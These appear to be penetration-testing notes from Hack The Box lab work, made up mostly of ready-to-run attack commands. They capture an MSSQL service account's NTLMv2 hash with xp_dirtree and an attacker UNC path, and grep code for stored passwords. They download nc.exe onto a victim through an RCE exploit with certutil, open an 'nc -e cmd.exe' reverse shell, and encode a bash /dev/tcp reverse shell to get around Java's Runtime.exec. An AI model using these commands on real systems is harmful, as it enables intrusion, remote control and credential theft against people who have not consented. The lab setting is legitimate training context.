General Tips
Capturing a Net-NTLMv2 password hash via SQL injection: with stacked queries on MSSQL, xp_dirtree makes the database server authenticate to an attacker-controlled UNC path, so Responder (or impacket-smbserver) listening on the attacker box receives the SQL service account's hash for offline cracking. HTB Giddy walkthrough: https://0xrick.github.io/hack-the-box/giddy/
EXEC master.sys.xp_dirtree '\\10.10.14.209\fakeshare'
Credentials are spelled many ways in source code (passwd, password, pwd, pass, secret ...), so grep for more than one spelling and ignore case rather than stopping at the first term:
find . -name "*.php" -print0 | xargs -0 grep -i -n "passwd"
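An added example (not part of the original notes) that extends the single "passwd" grep above into a one-pass search for the common credential spellings, run against a constructed sample tree so it works offline. The pattern list, the sample files and the helper names are assumptions for illustration; adjust the glob and pattern to the target's stack.

```shell
# Added example, not from the original page: one-pass credential grep over a
# source tree. Case-insensitive, extended regex, several spellings at once.

# Assumption: these are the spellings worth checking; the page only uses "passwd".
CRED_PATTERN='passwd|password|pwd|pass(phrase)?|secret|db_?pass|api_?key'

# grep_creds DIR [GLOB]: print file:line:text for every hit under DIR.
# Default glob is *.php as in the page's find command; pass '*' for all files.
# -exec ... {} + is used instead of xargs so an empty match set does not make
# grep wait on stdin; -H forces the filename even when only one file matches.
grep_creds() {
    dir=$1
    glob=${2:-*.php}
    find "$dir" -type f -name "$glob" \
        -exec grep -i -n -H -E "$CRED_PATTERN" {} + 2>/dev/null
}

# count_creds DIR [GLOB]: number of matching lines, for quick triage.
count_creds() {
    grep_creds "$@" | wc -l | tr -d ' '
}

# Constructed sample tree (hypothetical contents) so the example runs offline:
# a PHP config with a mixed-case "PassWord", a clean index.php, and a .env
# that only the wider glob picks up.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/inc"
    printf '%s\n' '<?php' '$db_user = "app";' '$db_PassWord = "hunter2";' '?>' > "$d/inc/config.php"
    printf '%s\n' '<?php' '// no credentials here' 'echo "hi";' > "$d/index.php"
    printf '%s\n' 'PWD=letmein' > "$d/.env"
    printf '%s' "$d"
}

# Usage:
#   d=$(make_sample_tree)
#   grep_creds "$d"          # PHP files only
#   grep_creds "$d" '*'      # everything, including dotfiles
```

Running it on the sample tree shows why the wider glob matters: the PHP-only pass finds the mixed-case hit in inc/config.php, and only the all-files pass surfaces the credential sitting in .env.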
Transferring Files to Windows Via Windows Command Execution
On the attacker PC, host the payload on a simple web server (e.g. python3 -m http.server 8000; the port must match the URL used in the certutil download step below).

Next, download the file onto the victim PC via RCE using certutil (certutil.exe ships with every Windows install, so it is a dependable download primitive when PowerShell's web cmdlets are blocked):
python exploit.py -u "admin@htb.local" -p "baconandchesse" -i "http://10.10.10.180" -c powershell.exe -a "/c certutil -urlcache -split -f http://10.10.14.34:8000/nc.exe c:/windows/temp/nc.exe"


Next, set up a listener on the attacker PC (e.g. nc -lvnp 8090; the port must match the one nc.exe connects back to below).

Next, on the victim PC, launch the newly downloaded nc.exe and connect back to the attacker PC:
python exploit.py -u "admin@htb.local" -p "baconandchesse" -i "http://10.10.10.180" -c powershell.exe -a "/c c:/windows/temp/nc.exe 10.10.14.34 8090 -e cmd.exe"


RCE Payload Workarounds:
java.lang.Runtime.exec:
Runtime.exec(String) splits the command on whitespace and never invokes a shell, so pipes, redirections and quotes are handed to the program as literal argv entries and a multi-word bash -c argument is torn apart. The workaround is to base64-encode the real command and give bash -c a single token that contains no spaces at all: bash brace expansion ({echo,X} expands to echo X) stands in for every space.
// RCE COMMAND
johnd@kali:~/HackTheBox$ echo 'bash -i >& /dev/tcp/10.10.14.14/8899 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNC84ODk5IDA+JjEK
// PAYLOAD
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNC84ODk5IDA+JjEK}|{base64,-d}|{bash,-i}
Paste the base64 exactly as produced and check it decodes back to the intended IP and port before firing it: a changed character or a stray trailing '=' makes base64 -d fail and no shell comes back.